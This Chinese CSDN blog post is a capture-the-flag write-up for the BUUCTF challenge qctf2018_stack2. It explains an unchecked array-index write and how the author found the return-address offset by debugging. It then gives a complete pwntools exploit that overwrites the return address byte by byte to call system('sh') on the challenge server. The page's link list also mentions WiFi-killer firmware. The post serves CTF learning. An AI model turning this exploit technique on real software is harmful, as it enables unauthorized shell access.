[BUUCTF-pwn]——qctf2018_stack2

最新推荐文章于 2023-08-30 11:08:17 发布
最新推荐文章于 2023-08-30 11:08:17 发布
阅读量355 收藏
点赞数
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/115406618
版权

CTF 栈溢出 漏洞利用 内存操作 系统调用
关键词由CSDN通过智能技术生成

[BUUCTF-pwn]——qctf2018_stack2

这道题注意一点v3的类型就好, 其他应该木有什么可以说的吧, 它是char*类型., 也就是每个我们赋值的v7只有低位的一个字节可以写进去
在这里插入图片描述
漏洞就在这里, 可以利用这里, 以v3为基准修改任意地址的数据.
在这里插入图片描述

还有一点需要注意的是偏移, 我最一开始写的时候, 想当然写成了0x40+4

主要原因是因为画圈的位置改变了esp, 懒得看汇编往上面找了直接动态调试.在这里插入图片描述

第一次执行该汇编的时候, eax就是我们开始输入的位置

在这里插入图片描述
在这里插入图片描述然后直接定位到retn看栈顶在这里插入图片描述在这里插入图片描述
在这里插入图片描述
找下sh位置
在这里插入图片描述

exploit


from pwn import*
p=remote('node3.buuoj.cn',26346)
p.sendlineafter("How many numbers you have:\n","1")
p.sendlineafter("Give me your numbers\n","1")
p.recvuntil("5. exit\n")
 
offset=0x84 
sys = 0x08048450
 
def write_addr(addr,num):
	p.sendline("3")
	p.sendlineafter("which number to change:\n",str(addr))
	p.sendlineafter("new number:\n",str(num))
	p.recvuntil("5. exit\n")

write_addr(offset,0X50)
write_addr(offset+1,0X84)
write_addr(offset+2,0X04)
write_addr(offset+3,0X08)
sh_addr =   0x08048987
offset+=8
write_addr(offset,0x87)
write_addr(offset+1,0X89)
write_addr(offset+2,0X04)
write_addr(offset+3,0X08)
 
p.sendline("5")
p.interactive()
Y-peak
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
qctf2018_stack2
qq_62887641的博客
08-30 70
然后本题坑点来了,他不是正常的开辟栈空间,如果是正常的话。有后门函数(不能用,出题人没有配置。ASLR保护机制使低4位仍是固定的。他每次只能改一个字节,一位一位改。数组没有检测边界,存在溢出。环境,但是又能用一点点。环境我们需要rop一下。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
[BUUCTF-pwn]——warmup_csaw_2016
Y_peak的博客
01-30 3838
BUUCTF——warmup_csaw_2016 题目地址:https://buuoj.cn/challenges 题目: 管他三七二十一,先将文件下载下来再说。老规矩,现在Linux上用checksec看看文件。64位,Stack、NX、PIE都没有开,应该是栈溢出的题。 赶快 go go go 去window 上用IDA反汇编看看,看到返回的是gets函数,一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。 按Shift + F12,看一下字符串。不看不知道一看有惊喜。cat flag.
[BUUCTF-pwn]——ciscn_2019_n_3
Y_peak的博客
11-20 3076
[BUUCTF-pwn]——ciscn_2019_n_3 结构体: //该结构体仅仅是选择字符串的时候的结构体 struct chunk { void *rec_str_print(); void *rec_str_free(); char *str; } //该结构体仅仅是选择数字的时候的结构体 struct chunk { void *rec_int_print(); void *rec_int_free(); int number; } 这道题目就是简单的u
[BUUCTF-pwn]——ciscn_2019_n_8
Y_peak的博客
02-10 1928
[BUUCTF-pwn]——ciscn_2019_n_8 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_8 题目 上去checksec一下,吓一跳保护基本全开了。 在IDA中一看,开心了。如此简单 只需要v[13] ==17 就好。因为var是以字符串的形式输入的。所以exploit如下: exploit from pwn import * p = remote("node3.buuoj.cn",29772) p.sendline("aaaa"*13 +
[BUUCTF-pwn]——jarvisoj_level0
Y_peak的博客
01-31 1770
[BUUCTF-pwn]——jarvisoj_level0 题目地址:https://buuoj.cn/challenges#jarvisoj_level0 题目: 还是先下载下来在Linux上checksex一下,基本确实又是栈溢出了。 64位,所以我们用64位的IDA打开,没什么有用的信息,点开vulnerable_function函数 发现栈溢出的read函数,前面为0意味着标准读入,后面的长度也可以。没毛病就是这个地方了。 再翻翻其他函数,发现了我们想要的system函数。找到位置,和需要覆
[BUUCTF-pwn]——wdb2018_guess (environ环境变量)
Y_peak的博客
04-06 1331
[BUUCTF-pwn]——wdb2018_guess 这个漏洞叫什么来着, 好像是stack smash, 具体就是主动触发canary保护来达到自己的目的. 这道题最后我也有一个小疑问, 这个程序为什么会莫名其妙执行三次. 嘶!!! 一个常见的保护开启NX canary RELRO 在IDA中看看, 那个buf就是我们要的flag 先主动触发一下canary看看会发送什么. 输出的是argv[0], 同时程序会再次执行,发现会重复执行三次. 思路 思路来了 利用主动触发canary保护, 调用**
[BUUCTF-pwn]——ciscn_2019_es_2(内涵peak小知识)
Y_peak的博客
02-16 1208
[BUUCTF-pwn]——ciscn_2019_es_2 题目地址: https://buuoj.cn/challenges#ciscn_2019_es_2 这是一道栈劫持的题,第一次写这种题的题解写的详细一点。 栈劫持 or 栈迁移 栈劫持也可以称为栈迁移,用来解决栈本身可以利用的空间不够用,一般是溢出空间不够用,没办法有效构造rop链。这个时候我们可以通过劫持ebp的方式,利用leave 和 ret两个汇编指令来做到栈劫持(栈迁移)。 leave 等价于 mov ebp, esp; pop
[BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode)(内涵peak小知识)
Y_peak的博客
03-29 1205
[BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode) 检查了下保护发现NX 没有开,肯定要自己写shellcode呀。 不过这道题,刷新了我的认知。众所周知,手写的shellcode里面肯定有很多不可见字符。第一次碰到可见的shellcode。 看下IDA, 不能反汇编不过问题不大,没事. 个人建议,看汇编的时候,建议看流程图,更加直观 将shellcode写入,那个buf 不过下面肯定大于0呀.rbp + var_8是我们输入字符串的长度.发生转
[BUUCTF-pwn]——rip
Y_peak的博客
01-30 1203
BUUCTF——rip 题目地址:https://buuoj.cn/challenges 题目: 同样我们现将文件下载下来,在Linux上用checksec 看下信息,发现这是一个64位程序,并且任何保护都没开。???? (任何保护都没开,基本就是栈溢出) 在window用IDA反汇编看看,打扰了main函数没有任何有用的东西,没有我们要找的system函数 看看其他函数看看有没有,功夫不负有心人。fun函数中,有我们想要的东西 赶快查看下fun函数所在的位置 0x401186 。我们看到是在0x
[BUUCTF-pwn]——ciscn_2019_c_1
Y_peak的博客
02-07 1186
[BUUCTF-pwn]——ciscn_2019_c_1 题目地址:https://buuoj.cn/challenges#ciscn_2019_c_1 题目: 下载下来checksec一下 再IDA上面看一下,利用shift + f12看下字符串,发现没有我们想要的字符串。以为是ret2shellcode,结果弄了半天不可以。重新看一遍发现开启了NX保护,原来是ret2libc类型的,呜呜呜。 ...
[BUUCTF-pwn]——others_shellcode
Y_peak的博客
02-12 1153
[BUUCTF-pwn]——others_shellcode 题目地址: https://buuoj.cn/challenges#others_shellcode peak 小知识 写这道题之前, 大家首先要了解, 想要获得一个shell, 除了system("/bin/sh") 以外, 还有一种更好的方法, 就是系统调用中的 execve("/bin/sh", NULL, NULL)获得shell。我们可以在 Linxu系统调用号表 中找到对应的系统调用号,进行调用, 其中系统调用号用 eax 储存
[BUUCTF-pwn]——pwnable_orw   (ORW)
Y_peak的博客
03-16 1146
[BUUCTF-pwn]——pwnable_orw 第一次碰到orw的问题,所谓orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 这个时候可以通过seccomptools,来查看 注意看到prctl就是将系统调用给你禁止了 exploit from pwn import * context.arch = 'i386' p = remote('node3.buuoj.cn',28626) shellcode = she
[BUUCTF-pwn]——test_your_nc
Y_peak的博客
01-30 1119
BUUCTF——test_your_nc 题目地址:https://buuoj.cn/challenges 题目: 下载题目看看,在Linux上用,checksec test检查发现是64位的程序,并且没有开启canary。 在window上用IDA,反汇编看下源码。 啊这,啊这。打扰了,根本不需要做任何操作人家直接给你了,呜呜呜~~~。 所以wp也就很简单了 # test.py from pwn import * p = remote("ip地址",ip端口) #看看给你的服务端口是什么 p.int
[BUUCTF-pwn]——ciscn_2019_n_1
Y_peak的博客
01-31 936
[BUUCTF-pwn]——ciscn_2019_n_1 [BUUCTF-pwn]——ciscn_2019_n_1思路一 —— 覆盖局部变量思路二 —— 覆盖返回地址 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_1 题目: 老规矩下载下来后,在Linux上checksec一下,64位,并且没有开启栈保护,意味着我们可以利用栈溢出 在IDA中看一下,main函数里面没有什么可以利用的 双击func函数看看,就是我们想要的。 思路一 —— 覆盖局部变量
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值